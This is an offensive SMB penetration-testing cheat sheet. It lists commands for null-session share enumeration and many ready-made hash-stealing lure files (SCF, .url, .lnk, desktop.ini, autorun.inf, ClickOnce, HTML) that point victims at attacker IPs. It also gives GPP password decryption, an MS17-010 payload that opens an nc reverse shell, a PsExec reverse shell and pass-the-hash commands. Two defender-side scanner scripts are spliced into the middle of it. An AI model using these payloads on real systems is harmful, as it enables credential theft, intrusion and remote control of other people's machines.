SMB
Note: for the client to work with every protocol version, the following must be set in the configuration file:
[global]
#### Kali configuration (use kali-tweaks to change it) ####
# By default a Kali system should be configured for wide compatibility,
# to easily interact with servers using old vulnerable protocols.
#client min protocol = LANMAN1
client min protocol = CORE
client max protocol = SMB3
## Browsing/Identification ###
# force user = acosta
# Change this to the workgroup/NT-domain name your Samba server will part of
# workgroup = DOMAIN
Null session and guest
smbmap
null session
smbmap -H 10.11.1.227 -u '' -p ''
user guest
smbmap -H 10.11.1.227 -u guest -p ''
smbclient
smbclient -L 10.11.1.227 -U 'workgroup/guest'
<ENTER>   (press Enter at the password prompt to send an empty password)
smbclient -U 'workgroup/guest' //10.11.1.227/share
<ENTER>   (again, empty password)
To enumerate more quickly, use smbclient's recursion feature with the following commands:
recurse on
dir
With just these two commands, dir walks the share recursively.
Netexec
netexec smb <hostname> -u '' -p '' --shares
netexec smb <hostname> -u 'guest' -p '' --shares
Obtaining password hashes
The goal here is to capture NTLMv2 hashes and then try to crack them with john or hashcat.
Source: https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/
SCF files
[Shell]
Command=2
IconFile=\\10.10.14.4\smb\uwu.ico
[Taskbar]
Command=ToggleDesktop
sudo responder -I tun0
Internet Shortcuts (.url)
Another kind of shortcut in Windows is the Internet shortcut. Save this as something.url:
echo [InternetShortcut] > stealMyHashes.url
echo URL=file://192.168.0.1/@OsandaMalith >> stealMyHashes.url
A slightly more creative way to perform the attack is the following. An icon is supplied to make it easier to persuade the user to click the link:
[InternetShortcut]
URL=https://securify.nl
IconIndex=0
IconFile=\\<responder ip>\leak\leak.ico
CLICKONCE
.NET's counterpart to Java Web Start is named ClickOnce. It works in a similar manner: applications are started via a ClickOnce deployment manifest file. These files can also contain UNC paths, just like Java Web Start. Remarkably, ClickOnce deployment manifests are not blocked by Outlook.
Figure 4: ClickOnce deployment manifest files are not blocked in Outlook
<?xml version="1.0" encoding="utf-8"?>
<asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:dsig="http://www.w3.org/2000/09/xmldsig#" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xrml="urn:mpeg:mpeg21:2003:01-REL-R-NS" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<assemblyIdentity name="Leak.app" version="1.0.0.0" publicKeyToken="0000000000000000" language="neutral" processorArchitecture="x86" xmlns="urn:schemas-microsoft-com:asm.v1" />
<description asmv2:publisher="Leak" asmv2:product="Leak" asmv2:supportUrl="" xmlns="urn:schemas-microsoft-com:asm.v1" />
<deployment install="false" mapFileExtensions="true" trustURLParameters="true" />
<dependency>
<dependentAssembly dependencyType="install" codebase="file://<responder ip>/leak/Leak.exe.manifest" size="32909">
<assemblyIdentity name="Leak.exe" version="1.0.0.0" publicKeyToken="0000000000000000" language="neutral" processorArchitecture="x86" type="win32" />
<hash>
<dsig:Transforms>
<dsig:Transform Algorithm="urn:schemas-microsoft-com:HashTransforms.Identity" />
</dsig:Transforms>
<dsig:DigestMethod Algorithm="http://www.w3.org/2000/09/xmldsig#sha1" />
<dsig:DigestValue>ESZ11736AFIJnp6lKpFYCgjw4dU=</dsig:DigestValue>
</hash>
</dependentAssembly>
</dependency>
</asmv1:assembly>
URL handlers
Name it leak.html, for example:
<!DOCTYPE html>
<html>
<script>
location.href = 'ms-word:ofe|u|\\<responder ip>\leak\leak.docx';
</script>
</html>
leak.htm, capturing hashes through Internet Explorer or Edge:
<!DOCTYPE html>
<html>
<img src="file://<responder ip>/leak/leak.png"/>
</html>
Java Web START
Name it leak.jnlp, for example:
<?xml version="1.0" encoding="UTF-8"?>
<jnlp spec="1.0+" codebase="" href="">
<resources>
<jar href="file://<responder ip>/leak/leak.jar"/>
</resources>
<application-desc/>
</jnlp>
Figure 3: JNLP files are blocked in Outlook
Shortcut Files (.lnk)
We can create a shortcut containing our network path, and as soon as you open the shortcut Windows will try to resolve that path. You can also specify a keyboard shortcut to trigger it. For the icon you can give the name of a Windows binary or choose an icon from shell32.dll, Ieframe.dll, imageres.dll, pnidui.dll or wmploc.dll in the system32 directory.
Set shl = CreateObject("WScript.Shell")
Set fso = CreateObject("Scripting.FileSystemObject")
currentFolder = shl.CurrentDirectory
Set sc = shl.CreateShortcut(fso.BuildPath(currentFolder, "\StealMyHashes.lnk"))
sc.TargetPath = "\\35.164.153.224\@OsandaMalith"
sc.WindowStyle = 1
sc.HotKey = "Ctrl+Alt+O"
sc.IconLocation = "%windir%\system32\shell32.dll, 3"
sc.Description = "I will Steal your Hashes"
sc.Save
The PowerShell version:
$objShell = New-Object -ComObject WScript.Shell
$lnk = $objShell.CreateShortcut("StealMyHashes.lnk")
$lnk.TargetPath = "\\35.164.153.224\@OsandaMalith"
$lnk.WindowStyle = 1
$lnk.IconLocation = "%windir%\system32\shell32.dll, 3"
$lnk.Description = "I will Steal your Hashes"
$lnk.HotKey = "Ctrl+Alt+O"
$lnk.Save()
Windows Script Files
Save this as something.wsf.
<package>
<job id="boom">
<script language="VBScript">
Set fso = CreateObject("Scripting.FileSystemObject")
Set file = fso.OpenTextFile("//192.168.0.100/aa", 1)
</script>
</job>
</package>
Desktop.ini
A desktop.ini file stores the icon settings applied to a folder. This can be abused to resolve a network path: once the folder is opened, the hashes are captured.
mkdir openMe
attrib +s openMe
cd openMe
echo [.ShellClassInfo] > desktop.ini
echo IconResource=\\192.168.0.1\aa >> desktop.ini
attrib +s +h desktop.ini
On Windows XP systems the desktop.ini file uses 'IconFile' instead of 'IconResource'.
[.ShellClassInfo]
IconFile=\\192.168.0.1\aa
IconIndex=1337
Autorun.inf
Starting with Windows 7 this feature is disabled. However, it can be enabled by changing the Autorun group policy. The Autorun.inf file must be hidden for this to work.
[autorun]
open=\\35.164.153.224\setup.exe
icon=something.ico
action=open Setup.exe
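As an added example (not from the original page or from the cited blog), a defender-side scanner for the INI-style carriers listed above (SCF, .url, desktop.ini, Autorun.inf): it parses the file, looks only at the keys the Windows shell resolves on its own, and reports every UNC or file:// host that is not on an allowlist. The key list, regexes and sample files are constructed for this example.

```python
import re
from dataclasses import dataclass

# Keys the shell resolves as soon as the file is listed or the folder is
# opened; a UNC or file:// value in one of them triggers outbound SMB auth.
# (Constructed list for this example.)
AUTO_RESOLVED_KEYS = {"iconfile", "iconresource", "url", "open", "icon"}

UNC_RE = re.compile(r"\\\\([^\\\s]+)\\")              # \\host\share\...
FILE_URL_RE = re.compile(r"file://([^/\s]+)/", re.I)  # file://host/...


@dataclass(frozen=True)
class Finding:
    key: str
    host: str
    value: str


def parse_ini(text):
    """Tolerant key=value parser; skips sections, comments and blank lines.
    Whitespace is stripped, so the trailing space 'echo' leaves is harmless."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "[;#" or "=" not in line:
            continue
        key, _, value = line.partition("=")
        entries.append((key.strip().lower(), value.strip()))
    return entries


def scan(text, trusted_hosts=frozenset()):
    """One Finding per auto-resolved key pointing at a host outside the
    (lower-cased) allowlist. Local icon paths such as %windir%\\... do not match."""
    findings = []
    for key, value in parse_ini(text):
        if key not in AUTO_RESOLVED_KEYS:
            continue
        for host in UNC_RE.findall(value) + FILE_URL_RE.findall(value):
            if host.lower() not in trusted_hosts:
                findings.append(Finding(key, host, value))
    return findings


# Constructed samples mirroring the file types discussed above.
SAMPLE_SCF = "[Shell]\nCommand=2\nIconFile=\\\\10.10.14.4\\smb\\uwu.ico\n[Taskbar]\nCommand=ToggleDesktop\n"
SAMPLE_URL = "[InternetShortcut] \nURL=file://192.168.0.1/@OsandaMalith\n"
SAMPLE_DESKTOP_INI = "[.ShellClassInfo]\nIconResource=\\\\192.168.0.1\\aa\n"
SAMPLE_AUTORUN = "[autorun]\nopen=\\\\35.164.153.224\\setup.exe\nicon=something.ico\naction=open Setup.exe\n"
SAMPLE_BENIGN = "[.ShellClassInfo]\nIconResource=%SystemRoot%\\system32\\shell32.dll,3\n"

if __name__ == "__main__":
    for name, text in (("scf", SAMPLE_SCF), ("url", SAMPLE_URL), ("desktop.ini", SAMPLE_DESKTOP_INI), ("autorun", SAMPLE_AUTORUN), ("benign", SAMPLE_BENIGN)):
        print(name, scan(text))
```

Run it over a folder tree (e.g. a share being audited) and feed `trusted_hosts` your own file servers so only unexpected hosts are reported.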
GPP Group.xml
This file is usually found under the (shared) SYSVOL directory:
./Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml
In that case, just run a tool to decrypt the password stored in this file:
git clone https://github.com/t0thkr1s/gpp-decrypt
python3 gpp-decrypt.py -f [groups.xml]
# or
python3 gpp-decrypt.py -c [cpassword]
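The defender-side counterpart, added here as an example (not the page's or gpp-decrypt's code): parse GPP XML files pulled from SYSVOL and report every element that still carries a cpassword attribute, without decrypting it. The list of preference files, the account attribute names and the sample XML are constructed assumptions for this example.

```python
import xml.etree.ElementTree as ET

# Preference files (relative to <GPO>/MACHINE|USER/Preferences/) that can
# carry cpassword; constructed list for the audit, not taken from the page.
GPP_FILES_WITH_CPASSWORD = (
    "Groups/Groups.xml", "Services/Services.xml",
    "ScheduledTasks/ScheduledTasks.xml", "DataSources/DataSources.xml",
    "Drives/Drives.xml", "Printers/Printers.xml",
)
# Attribute naming the account differs per preference type (assumed names).
ACCOUNT_ATTRS = ("userName", "username", "accountName", "runAs")


def find_cpasswords(xml_text):
    """Return (tag, account, cpassword_length) for each element with cpassword.
    The value itself is neither returned nor decrypted: presence is the finding."""
    hits = []
    for el in ET.fromstring(xml_text).iter():
        cpw = el.get("cpassword")
        if cpw is None:
            continue
        account = next((el.get(a) for a in ACCOUNT_ATTRS if el.get(a)), "<unknown>")
        hits.append((el.tag, account, len(cpw)))
    return hits


def audit_gpp(files):
    """files: {relative_path: xml_text}; returns {path: hits} for files with cpassword."""
    return {path: hits for path, text in files.items() if (hits := find_cpasswords(text))}


# Constructed Groups.xml mirroring the real layout; the cpassword is a placeholder.
SAMPLE_CPASSWORD = "PLACEHOLDER_NOT_A_REAL_CPASSWORD"
SAMPLE_GROUPS_XML = f"""<Groups>
  <User name="svc_backup" image="2" changed="2024-01-01 00:00:00">
    <Properties action="U" cpassword="{SAMPLE_CPASSWORD}" changeLogon="0"
                noChange="1" neverExpires="1" acctDisabled="0" userName="svc_backup"/>
  </User>
</Groups>"""
# Constructed Drives.xml with no stored credential (should produce no finding).
SAMPLE_CLEAN_XML = """<Drives><Drive name="H:"><Properties action="U" path="\\\\fs01\\home"/></Drive></Drives>"""

if __name__ == "__main__":
    print(audit_gpp({"Groups/Groups.xml": SAMPLE_GROUPS_XML,
                     "Drives/Drives.xml": SAMPLE_CLEAN_XML}))
```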
CVEs/Exploits
ms17-010
tools
cd cve/2017-0143/impacket
source exploit_ms17-010/bin/activate
At this point the environment is ready to run the script, but the payload still has to be prepared so that it works:
#include <stdlib.h>

/* Launches nc.exe from the SMB share in the background and connects back to
 * 192.168.119.156:80 with a cmd shell; the address and port must match the
 * smbserver and nc listener started below. */
int main(void) {
    system("START /B \\\\192.168.119.156\\smb\\nc.exe 192.168.119.156 80 -e cmd");
    return 0;
}
Adjust this payload every time before using it.
i686-w64-mingw32-gcc backup.c -o backup.exe
impacket-smbserver -smb2support smb /usr/share/windows-binaries
nc -nlvp 80
python ../impacket/send_and_execute.py 10.11.1.227 ../payload/backup.exe
PsExec
Download it from Sysinternals.
.\psexec -d -s -i ".\nc.exe -e powershell 10.10.14.14 8081"
Pass the hash
Impacket and evil-winrm
evil-winrm -i <hostname> -u user -H lmhash:nthash
impacket-psexec user@<hostname> -hashes lmhash:nthash
impacket-smbexec user@<hostname> -hashes lmhash:nthash
impacket-wmiexec user@<hostname> -hashes lmhash:nthash